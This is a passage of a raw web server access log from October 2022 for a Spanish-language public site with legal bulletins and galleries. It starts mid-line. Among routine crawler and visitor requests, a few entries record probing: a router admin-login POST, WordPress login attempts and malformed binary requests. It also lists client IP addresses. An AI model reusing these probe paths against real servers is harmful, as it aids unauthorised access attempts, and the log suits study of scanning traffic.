dpz4ZaCozmOoLeRJ81V5haf0v6BtlpHiF7cvX3Dlq20UU3txwmpC73IJqYxckubng4RsklPoyDnZmzDbv0d+QR4ecd7ATXQEs3PDJNbD/k2u29WvEBWkZAGlFSf2vW7zYTXP6nV5QPOL1nOV2VO73YfBtQecMoi2B82KcNi1KNGlGshL/onUbwnNYm9sfktIE8IsbQfdTLvGWMm0w0krWz50U+WhIWIA9EnJ52adZBvd3+/uiN4cwkQDUuk4bEkS/lPRKP6NajojQHs7kpixWpV+nmg2bEa9OM5UhF7jY5K7b+UWzXM3JDTnhwG+P4ZNyYq+YLicz3ENFPNtT5JLb/YvBNkc6mEtBN4FJlKjQwLIAfJEBPCltL0qHc+jd3laBbdhVMWmm+BBNkhMHKsLul/usgRNkOV5jDDvUB426HJ1zQaeOOZaF+bNs0YFTanJefB4FD7yK4LjksfPVw/UceGrXKDObbaDVhlfzI9R+AECmiLraleTq4jdEeTvy4Up+Jo4jfTwPsaaKU72gLk4yum/L0JEn/7NDAd7QS9cd613kHj1yACgGwML9X18UaH02x3a9IxQQR7nzN62qfxxAOv0oHhNpn2SXuR10oxHr18Vd4FPCpBPRmKuFdEEi4DQF4/vaZUghlNahZ60ytVLajKuXGnZo1bLFA01ZUGOomuOhoWa6BN9TUrwy6rThS6z2OGB2GkQ0Fil6BH7z6ub+i/VbgcBXq2dllgwm5gZvxkb6OAvmwB9kpe9Q0AN09urf9c1JVbTARRV2J0tzbH0dy6k+LMoDH9JGBwZvyqx9S05Mqg66mnvJ7cVp9IQ/sEDL9A/zRvRQCpjJ6IrKgXWhdKEsV1rH47zASFTz9pTOEE7zDPmOFYBFs5jhko8EaEwc6QcXEo8RDIheeDoqbU/mozkeD52eMyRPGcQLDBAKxQq3x/dGqOCDTbKwEkTJENwZt2ST0+RSY6vwJOoggScCRFqHD6XZbfM3Uqw0&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/jmmHvmDxLWhxO9uBsaGApig6nHX5aa+PnBaiBX6SLRq/9H4PplLg6nQialUy/ia4uA3CuxcmqiYZmo3nSTY8Y5FtuTmCWo/SNIbgSrf8c7PqoWAz+CJtGocauDdHKkb9ZhDt12tzXrWZl4ko1AzRk6mInw1PhCxg=&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18jrcz4xP0vRAIwszIkJkITkkP1qgL63AfYByGJnvOl9ry/GkJC/pYsDLieqzN4ZwS/kMeDZYzJ7mpoiYY5AO82rpLKnVBRhL+amgvuCY2zQr+Zl8Xa4XkUbo1ClfkS+fo7fu5KQCU6f91IShcxWNK1gPO2tQ3gLvI=&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19X/C5vIXveH6mmKJWiciCDP4PHHfj0k1RZ5W2XYvdNyzgGCuSTa4aIGgxuxAR4mQIfgJUU31B1qhW0lz6StWZ+GRMSAEfEMFcR0djhhbLDUw0YZtbJGXC2D/5/Zgs1bno7GmvSOttXpEIXo7/rU8B6BZuNgZDVF4w=&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Z4fbdvw2l+U6/X+rfgC/O1QJHD0Yz0OM9bPCTTqOgCyyRABTWX7aDoga6xR4ySd1naxEONXv3q7+iHs4WvxhGi0W+wQAX7kJd1RR3eEgwZ/EaLMFX9bwx13F7De1jwDOEOFNm+/4mk4Gb5u64SzNeltSmd6/wHplCm6lcAt72p3edARJ/r79JRbOAaXC2NezUhGt+3oEUfA==&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/7+VQr9NqNsC90mEeIAYnA5zzcqCu3Js3Ckx69fzyc3bJyG7V0y41KF4DNnAJjIINjZeB/lb6IJ8KldjnHG9cHOQbc62W84FGp5FDGlNZa0ZuOGEBwXqY+94mQREgmHpuApHuVrrMXOe+ylKimJR3C6klKxu+WROPV/CJ4CZVbrtMtKoxAIZNZPCi8llCNMCujZW0UR900HJe2ONsJrHdX8kC3x/rvyUlB99vONu8f+6rQqFRtUyPzJoRohujoCIVt6V9nrtUy9n8PdB74eQq7QPAqC/x2yi6WXz5cmKroPrbwNCTIOACmWy+iCyk+g8v+smndP2ROB0DZkKU0/6gEfu88k0gQb4NDNZB/dYgcJKEBDgbC/9/O2qAo7vBhrnwVchFcxyNjcKPjxDHwo38Eon8MaHD9YwG+R1v5I6wcd8Q+8YNQrY2l&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
186.29.159.42 - - [12/Oct/2022:03:24:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+1Ji5lsZQEUgMoAc5103pNcdHtcPnlzxqKfZmL2nmrloJrb9zKUaGzDoc4YvQV5zex7zmPwHlfZEdN9VxUkuOACskwZuf95xkFWXXn2z1X+jr0CSURHJmrGc+9zf7Eew71bmB7gpIIFxQ4n1XZbJdqvuiqqdMCiYgUpi+1tWdRgoX8LKfZfSZrVMfBzvfSckm3NlTmHISD0NFYGD+EkVbG2DkW9IrMkVQCuWz8SdmTVYOpeE2CmusMzIaBBycJ//gmJjt2KtjdSxN95EOFjuT1Yl46exewf/N6jKi/ej5rFx11gdgSKIpEDIjqNj8NMyDy4s0/xRyridIEXQ+WuQtLLUgmnPXibJlYqz+zagt2yAxW7JzQjPWIysxPHJw79/bD1AxOOE7kMg==&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 25
172.22.2.4 - - [12/Oct/2022:03:22:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:24:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [12/Oct/2022:03:23:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
201.245.192.253 - - [12/Oct/2022:03:27:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:27:31 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.48 - - [12/Oct/2022:03:29:06 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [12/Oct/2022:03:28:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:29:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
207.46.13.89 - - [12/Oct/2022:03:31:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2024.pdf HTTP/1.1" 200 409104
201.245.192.253 - - [12/Oct/2022:03:32:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44163
201.245.192.253 - - [12/Oct/2022:03:32:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41543
201.245.192.253 - - [12/Oct/2022:03:32:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:32:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:33:43 -0500] "GET /BLA/boletinlegal/documentos-importantes.php/niceforms.js HTTP/1.1" 200 4829
172.22.2.4 - - [12/Oct/2022:03:34:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:35:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [12/Oct/2022:03:37:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:37:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:38:05 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000007%20DEL%2025%20DE%20JULIO%20DEL%202022.pdf HTTP/1.1" 304 -
172.22.2.4 - - [12/Oct/2022:03:38:06 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%201%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 304 -
157.55.39.154 - - [12/Oct/2022:03:40:55 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [12/Oct/2022:03:40:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:03:42:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44163
201.245.192.253 - - [12/Oct/2022:03:42:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41543
201.245.192.253 - - [12/Oct/2022:03:42:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.73.97 - - [12/Oct/2022:03:42:27 -0500] "-" 408 -
216.245.221.92 - - [12/Oct/2022:03:42:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:41:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [12/Oct/2022:03:47:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:47:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:46:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:47:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.89 - - [12/Oct/2022:03:49:39 -0500] "GET /BLA/resoluciones/AUTOS%202016/0926.pdf HTTP/1.1" 200 528515
172.22.2.4 - - [12/Oct/2022:03:48:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62772
172.104.242.173 - - [12/Oct/2022:03:50:46 -0500] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 226
201.245.192.253 - - [12/Oct/2022:03:52:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:52:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.202 - - [12/Oct/2022:03:52:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000042.tif HTTP/1.1" 200 170364
172.22.2.4 - - [12/Oct/2022:03:52:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:52:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
172.22.2.4 - - [12/Oct/2022:03:55:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [12/Oct/2022:03:57:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:57:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.40 - - [12/Oct/2022:03:57:56 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
157.55.39.202 - - [12/Oct/2022:03:58:00 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
172.22.2.4 - - [12/Oct/2022:03:57:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:58:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
172.22.2.4 - - [12/Oct/2022:04:02:06 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [12/Oct/2022:04:02:10 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
201.245.192.253 - - [12/Oct/2022:04:02:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:02:30 -0500] "HEAD / HTTP/1.1" 200 -
54.39.177.48 - - [12/Oct/2022:04:02:54 -0500] "GET /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 200 1061
172.22.2.4 - - [12/Oct/2022:04:03:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:04:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
66.249.73.100 - - [12/Oct/2022:04:07:11 -0500] "-" 408 -
201.245.192.253 - - [12/Oct/2022:04:07:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:07:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:09:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:10:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [12/Oct/2022:04:12:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:12:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.190 - - [12/Oct/2022:04:12:54 -0500] "GET /forest/ HTTP/1.1" 200 12041
66.249.73.127 - - [12/Oct/2022:04:13:36 -0500] "-" 408 -
173.252.79.20 - - [12/Oct/2022:04:13:40 -0500] "GET /images/moda-sostenible-oct_optimized.jpg HTTP/1.1" 200 55305
172.22.2.4 - - [12/Oct/2022:04:15:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:04:17:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:17:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:16:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
157.55.39.25 - - [12/Oct/2022:04:18:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000027.tif HTTP/1.1" 200 42912
201.245.192.253 - - [12/Oct/2022:04:22:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43988
201.245.192.253 - - [12/Oct/2022:04:22:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
201.245.192.253 - - [12/Oct/2022:04:22:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:22:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:21:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:22:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
80.94.92.231 - - [12/Oct/2022:04:24:57 -0500] "GET / HTTP/1.1" 200 319
207.46.13.89 - - [12/Oct/2022:04:27:04 -0500] "GET /bla/resoluciones/autos%202015/0209.pdf HTTP/1.1" 200 521252
201.245.192.253 - - [12/Oct/2022:04:27:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:27:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:27:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:04:29:12 -0500] "-" 408 -
207.46.13.190 - - [12/Oct/2022:04:29:36 -0500] "GET /BLA/resoluciones/AUTOS%202013/2172.pdf HTTP/1.1" 200 844680
172.22.2.4 - - [12/Oct/2022:04:27:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50046
201.245.192.253 - - [12/Oct/2022:04:32:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43988
201.245.192.253 - - [12/Oct/2022:04:32:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
201.245.192.253 - - [12/Oct/2022:04:32:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:32:30 -0500] "HEAD / HTTP/1.1" 200 -
45.61.186.4 - - [12/Oct/2022:04:32:50 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
69.63.184.1 - - [12/Oct/2022:04:34:07 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [12/Oct/2022:04:32:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:33:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
43.152.67.140 - - [12/Oct/2022:04:35:44 -0500] "GET /galeria/galeria/fotos/mirador4P.jpg HTTP/1.1" 200 11757
201.245.192.253 - - [12/Oct/2022:04:37:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:37:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:04:38:03 -0500] "-" 408 -
172.22.2.4 - - [12/Oct/2022:04:38:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:39:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
201.245.192.253 - - [12/Oct/2022:04:42:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43988
201.245.192.253 - - [12/Oct/2022:04:42:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Oct/2022:04:42:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41535
216.245.221.92 - - [12/Oct/2022:04:42:30 -0500] "HEAD / HTTP/1.1" 200 -
138.68.163.158 - - [12/Oct/2022:04:44:03 -0500] "+Ml\x9eKM\x02\xe1<\x8dh#\x04\xbd\x17\xc0\xaf.\x95Y\x8f" 501 953
138.68.163.158 - - [12/Oct/2022:04:44:04 -0500] "\x16\x03\x01" 400 226
138.68.163.158 - - [12/Oct/2022:04:44:04 -0500] "\x16\x03\x01" 400 226
138.68.163.158 - - [12/Oct/2022:04:44:04 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [12/Oct/2022:04:44:46 -0500] "-" 408 -
17.121.115.187 - - [12/Oct/2022:04:46:00 -0500] "-" 408 -
172.22.2.4 - - [12/Oct/2022:04:44:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:45:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [12/Oct/2022:04:47:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.202 - - [12/Oct/2022:04:47:23 -0500] "GET /BLA/resoluciones/00000042.tif HTTP/1.1" 404 1018
216.245.221.92 - - [12/Oct/2022:04:47:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:04:50:44 -0500] "-" 408 -
184.105.139.68 - - [12/Oct/2022:04:51:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [12/Oct/2022:04:51:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [12/Oct/2022:04:50:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:04:52:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:52:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:51:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
172.22.2.4 - - [12/Oct/2022:04:51:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
184.105.139.108 - - [12/Oct/2022:04:54:35 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.73.127 - - [12/Oct/2022:04:56:48 -0500] "-" 408 -
201.245.192.253 - - [12/Oct/2022:04:57:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:04:57:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:56:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:04:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [12/Oct/2022:05:02:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:05:02:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:05:02:52 -0500] "-" 408 -
185.119.81.103 - - [12/Oct/2022:05:03:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [12/Oct/2022:05:03:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [12/Oct/2022:05:02:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.52.34 - - [12/Oct/2022:05:04:20 -0500] "GET /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 200 1061
172.22.2.4 - - [12/Oct/2022:05:02:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
207.46.13.89 - - [12/Oct/2022:05:06:36 -0500] "GET /BLA/resoluciones/AUTOS%202013/0995.pdf HTTP/1.1" 200 1459762
201.245.192.253 - - [12/Oct/2022:05:07:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:05:07:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [12/Oct/2022:05:08:44 -0500] "-" 408 -
157.55.39.202 - - [12/Oct/2022:05:08:55 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [12/Oct/2022:05:07:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:05:08:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
157.55.39.25 - - [12/Oct/2022:05:10:29 -0500] "GET /Publicaciones/2022EE130788.pdf HTTP/1.1" 404 228
201.245.192.253 - - [12/Oct/2022:05:12:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:05:12:30 -0500] "HEAD / HTTP/1.1" 200 -
190.159.232.64 - - [12/Oct/2022:05:12:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.159.232.64 - - [12/Oct/2022:05:12:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.159.232.64 - - [12/Oct/2022:05:12:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
94.232.47.167 - - [12/Oct/2022:05:12:46 -0500] "\x03" 400 226
190.159.232.64 - - [12/Oct/2022:05:12:47 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.159.232.64 - - [12/Oct/2022:05:12:47 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
94.232.47.167 - - [12/Oct/2022:05:12:47 -0500] "\x03" 400 226
190.159.232.64 - - [12/Oct/2022:05:12:47 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
190.159.232.64 - - [12/Oct/2022:05:12:48 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
190.159.232.64 - - [12/Oct/2022:05:12:49 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
190.159.232.64 - - [12/Oct/2022:05:12:50 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
190.159.232.64 - - [12/Oct/2022:05:12:51 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
